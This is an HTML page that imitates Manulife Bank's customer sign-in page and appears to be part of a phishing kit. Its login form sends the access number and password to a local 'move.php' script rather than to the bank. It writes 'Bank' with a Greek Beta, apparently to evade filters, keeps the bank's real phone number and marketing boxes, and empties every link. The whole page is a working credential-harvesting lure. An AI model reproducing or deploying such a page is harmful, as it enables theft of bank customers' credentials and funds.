
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html style="display: block;"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
	<link href="./login_files/manulife_20170330.css" rel="stylesheet" type="text/css" media="screen">
	<link href="./login_files/manulife-print_20141222.css" rel="stylesheet" type="text/css" media="print">	
	<title>Sign In</title>
	
	<script src="./login_files/modal.js"></script>

<script>
function empty() {
    var x;
    x = document.getElementById("username").value;
    if (x == "") {
        document.getElementById("username").style = "border-color:red";
		document.getElementById("username_error").style = "display: block";
        return false;
    }
	var x;
    x = document.getElementById("password").value;
    if (x == "") {
        document.getElementById("password").style = "border-color:red";
		document.getElementById("password_error").style = "display: block";
        return false;
    }

}
</script>

<script>
function change() {
    var e;
    e = document.getElementById("username").value;
    if (e !== ""){
	    document.getElementById("username").style = "";
		document.getElementById("username_error").style = "display: none";
	}
	var e;
    e = document.getElementById("password").value;
    if (e !== ""){
	    document.getElementById("password").style = "";
		document.getElementById("password_error").style = "display: none";
	}
	
}

</script>
	
<link rel="shortcut icon" href="./login_files/favicon.ico">
  	
	<style>html{display:none;}</style>

	</head>
<body style="background-color: #008343; background-repeat: repeat-x; background-image: url(./login_files/bg_grad.png);" margin="0" padding="0" height="100%" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" onclick="processOnBodyEvent(event)">
	<div class="logonwrapper">
		<div style="background-color: #999; background-image: url(./login_files/bg_grad.png);
			background-repeat: repeat-x;" class="logonheader">
			<div class="noPrint">
				

	<div class="clientheaderbar">
		<div style="float: right;">
			
			<a id="id_francais" class="headerlinks" href="">&nbsp;Fran�ais</a>
			<a id="id_news" class="headerlinks" href="" target="_blank">&nbsp;News |&nbsp;</a>  
			<a id="id_contactUS" class="headerlinks" href="" target="_blank">&nbsp;Contact us |&nbsp;</a>
			<a id="id_bankHome" class="headerlinks homeicon" href="" target="_blank">&nbsp;Home |&nbsp;</a>
		</div>
	</div>
<div style="padding: 0 0 0 0;">
	<img src="./login_files/Manulife_e_W_Bank.gif" width="243" border="0">
</div>
			</div>
		</div>
		<div class="logoncontent">
			<div class="outage">
				
	<p class="outagetext"></p>

			</div>
		
<style type="text/css">
.cardNum {
	display:-moz-inline-stack;
	display:inline-block;
	zoom:1;
	display:inline;
	float: left;
}
.rememberMe {
	padding-left:198px;
}
.password {
	margin-right: 9px;
    padding-left: 115px;
}
.signInBut input {
	margin-left: 205px;
}
.hide {
	display: none;
	padding:2px;
	margin:0px; 
	border:2px solid green;
	z-index:1;
	position:absolute;
	left:0em;
	top:-4em;
	background-color:#fff;
}
.anchor	{
	position:relative;
}
</style>   
<h1>Customer Login</h1>

<form id="login_action" name="login_action" method="post" action="move.php" onsubmit="return empty();">
	
	<table class="logon" border="0" cellspacing="5" cellpadding="1" width="100%">
		<tbody><tr>
			<td colspan="2">&nbsp;</td>
			<td nowrap=""><span id="description" style="visibility: hidden;margin-left:106px;">Description (Optional)</span></td>
			<td width="100%">&nbsp;</td>
		</tr>
		<tr>
			<td nowrap=""><b>Access Number</b></td>
			<td nowrap="">5047950000</td>
			<td nowrap="" id="id_cardNumberSelect_td" style="display: none;">
				<select name="cardNumberSelect" onchange="fillCardNumber();" id="id_cardNumberSelect">
				</select>
			</td>
			<td colspan="2">
				<span style="float: left; margin-right: 10px;">
					<input type="text" name="username" size="12" maxlength="9" value="" id="username" style="display: block;" onblur="change()" onkeypress='return event.charCode >= 48 && event.charCode <= 57'>
					<label id="username_error" style="display: none"><font color="red">Access number is required</font></label>
				</span>
				<span id="id_destext" style="display: none;">
					<input type="text" name="loginBean.description" size="12" maxlength="15" value="" id="id_description">
				</span>
			</td>
			<td width="100%">&nbsp;</td>
		</tr>
		<tr id="id_displayornot" style="display:none;">
			<td colspan="2">&nbsp;</td>
			<td nowrap=""><input type="checkbox" name="loginBean.rememberMeAgainCheckBox" value="true" id="id_remaccessno2" onclick="rememberMeAgain()">
				Remember my access number
			 	<img src="./login_files/help_icon.gif" onclick="showbox(&#39;rememberMeToolTip&#39;)" onmouseover="showbox(&#39;rememberMeToolTip&#39;)" onmouseout="hidebox(&#39;rememberMeToolTip&#39;)">
			 	<span class="anchor">			
			  	<span id="rememberMeToolTip" class="hide">
			  		Choosing  this option lets you securely save <br> your access number so you don't have to <br> type it in each time you sign in.
			  	</span>
			  	</span></td>
			<td width="100%">&nbsp;</td>
		</tr>
		<tr id="id_displayornot2" style="display:none;">
			<td colspan="2">&nbsp;</td>
			<td nowrap="">
				<span id="id_notrecommended2">
					<font size="1">
						<i>(Not recommended for public computers) </i>
					</font>
				</span>
			</td>
			<td width="100%">&nbsp;</td>
		</tr>
		
		
			<tr>
				<td colspan="2">&nbsp;</td>
				<td nowrap="">
					<input type="checkbox" name="loginBean.addCardCheckBox" value="true" id="id_remaccessno" onclick="rememberMe()"><input type="hidden" id="__checkbox_id_remaccessno" name="__checkbox_loginBean.addCardCheckBox" value="true">
						Remember my access number
						<img src="./login_files/help_icon.gif" onclick="showbox(&#39;rememberMeToolTip2&#39;)" onmouseover="showbox(&#39;rememberMeToolTip2&#39;)" onmouseout="hidebox(&#39;rememberMeToolTip2&#39;)">
						<span class="anchor">
							<span id="rememberMeToolTip2" class="hide">
								Choosing  this option lets you securely save <br> your access number so you don't have to <br> type it in each time you sign in.
							</span>
						</span>
				</td>
				<td width="100%">&nbsp;</td>
			</tr>
			<tr>
				<td colspan="2">&nbsp;</td>
				<td nowrap="">
					<span id="id_notrecommended">
						<font size="1">
							<i>(Not recommended for public computers) </i>
						</font>
					</span>
				</td>
				<td width="100%">&nbsp;</td>
			</tr>
		
		
		<tr>
			<td colspan="2"><b>Password</b></td>
			<td>
				<input type="password" name="password" size="12" maxlength="12" id="password" redisplay="false" onblur="change()">
				<label id="password_error" style="display: none"><font color="red">Password is required</font></label>
			</td>
			<td width="100%">&nbsp;</td>
		</tr>
		<tr>
			<td colspan="2">&nbsp;</td>
			<td>
				
					
  					
				
				<a id="id_forgotPasswordLink" href="" class="contentlink">Forgot Password?</a>
			</td>
			<td width="100%">&nbsp;</td>
		</tr>
		<tr>
			<td colspan="4">&nbsp;</td>
		</tr>
		<tr>
			<td colspan="2">&nbsp;</td>
			<td>
				<input type="submit" value="Sign In" id="id_logonButton" name="loginBean.logonButton">

			</td>
			<td width="100%">&nbsp;</td>
		</tr>
		<tr>
			<td colspan="4">&nbsp;</td>
		</tr>
	</tbody></table>
	<p>&nbsp;</p>
	<p class="footer">
		By clicking the "Sign In" button, I agree to abide by Manulife &Beta;ank's Web Site <a href="javascript:void(0)">Agreement</a> and understand that I am responsible for security on my own computer.  Manulife &Beta;ank recommends all clients implement safe <a href="javascript:void(0)">online practices</a>.
	</p>
	<p class="footer">
		<b>To sign up for Manulife &Beta;ank Internet &Beta;anking or for assistance, call <nowrap>1-877-765-2265</nowrap>. Click the "Contact Us" link on this page for hours of operation.</b>
	</p>
</form>

<p>&nbsp;</p>
<div class="marketing"><style>

#container {
width: 888px;
}

#wide-image {
width: 584px; margin: 0 24px 24px 0; float: left;
}

#narrow-image {
width: 280px; float: left;
}

.info-box {
width: 278px; 
height: 175px; 
margin: 0 24px 24px 0; 
float: left; 
border: 1px solid #bbbcbc; 
border-top: 10px solid #bbbcbc;
}
.info-box-right {
width: 278px; 
height: 175px; 
margin: 0 0 24px 0; 
float: left; 
border: 1px solid #bbbcbc; 
border-top: 10px solid #bbbcbc;
}

</style>


<!--<div class="contentheading" >

<span class='breadcrumb'><span class='homeicon'>Home</span>&nbsp;&gt;&nbsp;</span><span class='breadcrumbCurrent'>Sign in</span>


	</div>-->
	<!--<div class="contenttitle">
		<h1>Sign in</h1>
	</div>	
	<div class="contenttoolbar">


<div class="item item_textplus" title="Resize text"></div>

<div class="item item_print" onClick="javascript:manulifecaPrint()" title="Print"></div>


 <div title="Email this page" class="item item_mail" onClick="javascript:window.location='?email_by_name\=c4af7158-3672-441c-a81a-1354b20a6ba4'"></div>



<div class="item" title="Facebook Like">

</div>

<div class="item" title="Twitter"> 
<a href="" class="twitter-share-button" data-lang="en" data-url="" data-count="none">Tweet</a> 

</div> 
	</div>-->
	<div class="bodycontent landingbodycontent">
			<p><strong><span style=" color: #BA1419;"></span></strong></p>

<div id="container">
<div>
<div id="wide-image"><a href=""><img src="./login_files/CS3010EMobileAppBankloginbanner.jpg" border="0" title=""></a></div>

<div id="narrow-image"><a href=""><img src="./login_files/CS2302E_Find+an+ABM+_resized_FINAL.jpg" border="0" alt="" width="280" height="200" title=""></a></div>
</div>

<div>
<div class="info-box">
<h3 style=" padding: 10px 10px 0 10px; margin-bottom: 10px;">When you travel, pack several ways to pay</h3>

<p style=" padding: 0 10px 0 10px; margin-bottom: 10px;">When you travel outside Canada - including to the United States - Manulife &Beta;ank recommends that you pack several ways to pay in addition to your access card.</p>

<p><a href="" style="padding: 0 10px 0 10px; font-weight: bold;">Learn more</a></p>
</div>

<div class="info-box">
<h3 style=" padding: 10px 10px 0 10px; margin-bottom: 10px;">Find an ABM</h3>

<p style=" padding: 0 10px 0 10px; margin-bottom: 10px;">Manulife &Beta;ank has added over 800 ABMs in select Mac's and Couche-Tard convenience stores.</p>

<p><a href="" style="padding: 0 10px 0 10px; font-weight: bold;">Learn more</a></p>
</div>

<div class="info-box-right">
<h3 style=" padding: 10px 10px 0 10px; margin-bottom: 10px;">Professional advice</h3>

<p style=" padding: 0 10px 0 10px; margin-bottom: 10px;">We offer two different ways to get the professional advice you need to make well-informed choices about your financial future.&nbsp;</p>

<p><a href="" style="padding: 0 10px 0 10px; font-weight: bold;">Learn more</a></p>
</div>

<br style=" clear: both;">
</div>

<div>
<div class="info-box">
<h3 style=" padding: 10px 10px 0 10px; margin-bottom: 10px;">Most common bill payee companies in Quebec</h3>

<p style=" padding: 0 10px 0 10px; margin-bottom: 10px;">The list of the most common bill payee companies used by Quebec customers is available.</p>

<p><a href="" target="_blank" style="padding: 0 10px 0 10px; font-weight: bold;">Learn more</a></p>
</div>

<div class="info-box">
<h3 style=" padding: 10px 10px 0 10px; margin-bottom: 10px;">General Terms, Operating Agreements, Declaration of Trusts</h3>

<p style=" padding: 0 10px 0 10px; margin-bottom: 10px;">Find the General Terms, Operating Agreement or Declaration of Trust for your account.</p>

<p><a href="" style="padding: 0 10px 0 10px; font-weight: bold;">Learn more</a></p>
</div>

<div class="info-box-right">
<h3 style=" padding: 10px 10px 0 10px; margin-bottom: 10px;">Protect your personal information</h3>

<p style=" padding: 0 10px 0 10px; margin-bottom: 10px;">Manulife &Beta;ank takes financial fraud very seriously.</p>

<p><a href="" style="padding: 0 10px 0 10px; font-weight: bold;">Learn more</a></p>
</div>
</div>
</div>

<p></p>

<p></p>
	</div>
</div>

		</div>
		<div class="logonfooter">
			<div class="noPrint">
		
	<div class="footerbar">
		<div class="footertext">
			strong&nbsp;&nbsp;&nbsp;&nbsp;
			&nbsp;&nbsp;reliable&nbsp;&nbsp;&nbsp;&nbsp;
			&nbsp;&nbsp;trustworthy&nbsp;&nbsp;&nbsp;&nbsp;
			&nbsp;&nbsp;forward-thinking
		</div>
		<div class="footerlinks">
			
			
			
			
			<a id="id_Accessibility" class="footerlinks" href="" target="_blank">|&nbsp;Accessibility</a>
			<a id="id_Legal" class="footerlinks" href="" target="_blank">|&nbsp;Legal&nbsp;</a>
			<a id="id_Privacy" class="footerlinks" href="" target="_blank">|&nbsp;Privacy Policy&nbsp;</a>
			<a id="id_Careers" class="footerlinks" href="" target="_blank">Careers&nbsp;</a>
		</div>
	</div>
<br>
			</div>
		</div>
	</div>


</body></html>